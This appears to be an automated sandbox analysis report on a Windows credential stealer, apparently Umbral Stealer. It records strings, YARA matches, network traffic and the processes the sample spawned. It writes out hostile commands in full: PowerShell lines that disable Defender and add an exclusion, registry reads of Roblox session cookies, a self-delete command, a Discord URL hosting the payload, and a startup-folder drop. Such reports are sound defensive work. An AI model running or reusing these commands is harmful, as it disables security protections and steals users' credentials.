                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                        Source: uGCIY.scr.0.drString found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
                        Source: powershell.exe, 00000017.00000002.2088964363.000001E206122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61221000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
                        Source: obvious.exe, uGCIY.scr.0.drString found in binary or memory: https://gstatic.com/generate_204e==================Umbral
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61713000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F612A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1176050474064019486/12780529320964
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1176050474064019486/1278052932096491550/Umbral-927537.zip?e
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F612A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1176050474064019486/12780529320964Pj
                        Source: powershell.exe, 00000005.00000002.1768715652.000001E0B9866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BBAD6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.00000249304E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.0000024930618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E215F70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E2078AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 0000000A.00000002.1822175279.0000012BBAA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 0000000A.00000002.1822175279.0000012BBAA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.4:49740 version: TLS 1.2

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Modifies the hosts file
                        Source: C:\Users\user\Desktop\obvious.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: obvious.exe, type: SAMPLEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BAE32180_2_00007FFD9BAE3218
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BB089C00_2_00007FFD9BB089C0
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BAEB1280_2_00007FFD9BAEB128
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BAE57600_2_00007FFD9BAE5760
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BADDFD00_2_00007FFD9BADDFD0
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BAEAF450_2_00007FFD9BAEAF45
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BAF16800_2_00007FFD9BAF1680
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BB245A00_2_00007FFD9BB245A0
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BB245280_2_00007FFD9BB24528
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BAE445E0_2_00007FFD9BAE445E
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BAE8C360_2_00007FFD9BAE8C36
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BADF0880_2_00007FFD9BADF088
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BAE1CB60_2_00007FFD9BAE1CB6
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BC973990_2_00007FFD9BC97399
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BCA02F00_2_00007FFD9BCA02F0
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BCA69E10_2_00007FFD9BCA69E1
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BCA89E20_2_00007FFD9BCA89E2
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BCA06CD0_2_00007FFD9BCA06CD
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BCA364C0_2_00007FFD9BCA364C
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BC96C650_2_00007FFD9BC96C65
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BC9DC670_2_00007FFD9BC9DC67
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BC924380_2_00007FFD9BC92438
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BC9092C0_2_00007FFD9BC9092C
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BC930600_2_00007FFD9BC93060
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BC967C50_2_00007FFD9BC967C5
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BC9BE320_2_00007FFD9BC9BE32
                        Source: C:\Users\user\Desktop\obvious.exeCode function: 0_2_00007FFD9BCA6E430_2_00007FFD9BCA6E43
                        Source: obvious.exe, 00000000.00000000.1680368592.0000012F5F5DC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename vs obvious.exe
                        Source: obvious.exeBinary or memory string: OriginalFilename vs obvious.exe
                        Source: obvious.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: obvious.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                        Source: obvious.exe, ----.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: obvious.exe, -------.csBase64 encoded string: 'VoeLMljCcEVYfU8W72kDheVSIJZdBPUywVEujaMaKUX+PC3GIKJuwMiEe7SihdddwhgBZHoukcGwL8nohVpawkFH+1KHFQgONA+o1YtwWGfTOU3PHEhJpJmERZeGm0av3EWAZqAkP4emgxmXrx3wjZ4oQelWGSkFuJJzen3g9AooZA4nXbYa93I='
                        Source: uGCIY.scr.0.dr, ----.csBase64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
                        Source: uGCIY.scr.0.dr, -------.csBase64 encoded string: 'VoeLMljCcEVYfU8W72kDheVSIJZdBPUywVEujaMaKUX+PC3GIKJuwMiEe7SihdddwhgBZHoukcGwL8nohVpawkFH+1KHFQgONA+o1YtwWGfTOU3PHEhJpJmERZeGm0av3EWAZqAkP4emgxmXrx3wjZ4oQelWGSkFuJJzen3g9AooZA4nXbYa93I='
                        Source: uGCIY.scr.0.dr, ----.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: uGCIY.scr.0.dr, ----.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: obvious.exe, ----.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: obvious.exe, ----.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@39/23@3/2
                        Source: C:\Users\user\Desktop\obvious.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\obvious.exe.logJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
                        Source: C:\Users\user\Desktop\obvious.exeMutant created: \Sessions\1\BaseNamedObjects\Ias6tBDXXaWYdVykfgAQ
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
                        Source: C:\Users\user\Desktop\obvious.exeFile created: C:\Users\user\AppData\Local\Temp\hGQwf2dJC9byEfmJump to behavior
                        Source: obvious.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: obvious.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\obvious.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61560000.00000004.00000800.00020000.00000000.sdmp, KtE6mRAFZ5iEcgF.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: obvious.exeReversingLabs: Detection: 78%
                        Source: C:\Users\user\Desktop\obvious.exeFile read: C:\Users\user\Desktop\obvious.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\obvious.exe "C:\Users\user\Desktop\obvious.exe"
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe"
                        Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pause
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2Jump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITYJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get CaptionJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemoryJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIERJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get nameJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pauseJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: devenum.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: devobj.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: msdmo.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\obvious.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
